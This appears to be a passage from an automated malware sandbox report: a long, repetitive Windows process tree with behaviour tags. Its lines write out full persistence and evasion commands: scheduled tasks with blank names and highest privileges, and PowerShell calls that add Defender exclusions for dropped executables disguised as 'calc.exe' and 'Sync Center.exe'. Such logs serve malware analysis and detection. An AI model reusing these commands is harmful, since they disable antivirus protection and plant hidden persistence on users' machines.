"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
23⤵
PID:5404

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
24⤵
PID:5564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
22⤵
PID:3828

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
22⤵
- Executes dropped EXE
PID:3932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
21⤵
- Command and Scripting Interpreter: PowerShell
PID:2108

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
21⤵
- Executes dropped EXE
PID:2996

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
22⤵
PID:4272

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
23⤵
PID:3152

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
22⤵
PID:3876

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
23⤵
- Scheduled Task/Job: Scheduled Task
PID:1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
21⤵
- Command and Scripting Interpreter: PowerShell
PID:4324

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
21⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:3188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
20⤵
- Command and Scripting Interpreter: PowerShell
PID:5096

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
20⤵
- Executes dropped EXE
PID:4600

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
21⤵
PID:2712

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
22⤵
- Scheduled Task/Job: Scheduled Task
PID:4064

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
21⤵
PID:4900

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
22⤵
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
20⤵
- Command and Scripting Interpreter: PowerShell
PID:1292

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
20⤵
- Executes dropped EXE
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
19⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
19⤵
- Executes dropped EXE
PID:2976

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
20⤵
PID:2080

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
21⤵
- Scheduled Task/Job: Scheduled Task
PID:1016

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
20⤵
PID:3004

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
21⤵
PID:3520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
19⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
19⤵
- Executes dropped EXE
PID:4188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
18⤵
- Command and Scripting Interpreter: PowerShell
PID:4244

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
18⤵
- Executes dropped EXE
PID:2456

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
19⤵
PID:4064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
20⤵
PID:3212

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
20⤵
PID:2600

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
19⤵
PID:1272

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
20⤵
- Scheduled Task/Job: Scheduled Task
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
18⤵
- Command and Scripting Interpreter: PowerShell
PID:4836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
19⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
18⤵
- Executes dropped EXE
PID:2828

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2828 -s 692
19⤵
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
17⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
17⤵
- Executes dropped EXE
PID:1080

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
18⤵
PID:3036

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
19⤵
- Scheduled Task/Job: Scheduled Task
PID:3464

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
18⤵
PID:3212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
19⤵
PID:4672

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
19⤵
- Scheduled Task/Job: Scheduled Task
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
17⤵
- Command and Scripting Interpreter: PowerShell
PID:5112

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
17⤵
- Executes dropped EXE
PID:1436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
16⤵
PID:4052

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
16⤵
- Executes dropped EXE
PID:4144

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
17⤵
PID:3036

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
18⤵
PID:4520

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
17⤵
PID:3212

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
18⤵
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
16⤵
- Command and Scripting Interpreter: PowerShell
PID:4512

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
16⤵
- Executes dropped EXE
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
15⤵
- Command and Scripting Interpreter: PowerShell
PID:1292

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
15⤵
- Executes dropped EXE
PID:4688

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
16⤵
PID:2168

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
17⤵
PID:4556

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
16⤵
PID:1492

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
17⤵
- Scheduled Task/Job: Scheduled Task
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
15⤵
- Command and Scripting Interpreter: PowerShell
PID:4856

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
15⤵
- Executes dropped EXE
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
14⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
14⤵
- Executes dropped EXE
PID:4324

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
15⤵
PID:4976

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
16⤵
PID:3320

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
15⤵
PID:3128

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
16⤵
- Scheduled Task/Job: Scheduled Task
PID:1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
14⤵
PID:2620

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
14⤵
- Executes dropped EXE
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
14⤵
PID:4052

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
15⤵
- Scheduled Task/Job: Scheduled Task
PID:4976

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
14⤵
PID:724

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
15⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2524

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
13⤵
PID:2168

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
14⤵
PID:4272

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
13⤵
PID:4744

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
14⤵
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
11⤵
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
12⤵
PID:1972

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
13⤵
PID:4744

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
12⤵
PID:2076

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
13⤵
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
11⤵
PID:3324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
12⤵
- Scheduled Task/Job: Scheduled Task
PID:3552

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
11⤵
PID:4440

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
12⤵
- Scheduled Task/Job: Scheduled Task
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
10⤵
PID:2512

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
11⤵
- Scheduled Task/Job: Scheduled Task
PID:4580

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
10⤵
PID:3604

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
11⤵
PID:2076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
9⤵
PID:4324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
10⤵
PID:4760

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
9⤵
PID:4468

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
10⤵
- Scheduled Task/Job: Scheduled Task
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
7⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
8⤵
PID:4640

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
9⤵
PID:1892

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
8⤵
PID:4072

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
9⤵
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
6⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
7⤵
PID:3556

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
8⤵
- Scheduled Task/Job: Scheduled Task
PID:3648

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
7⤵
PID:1892

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
8⤵
PID:3984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
6⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
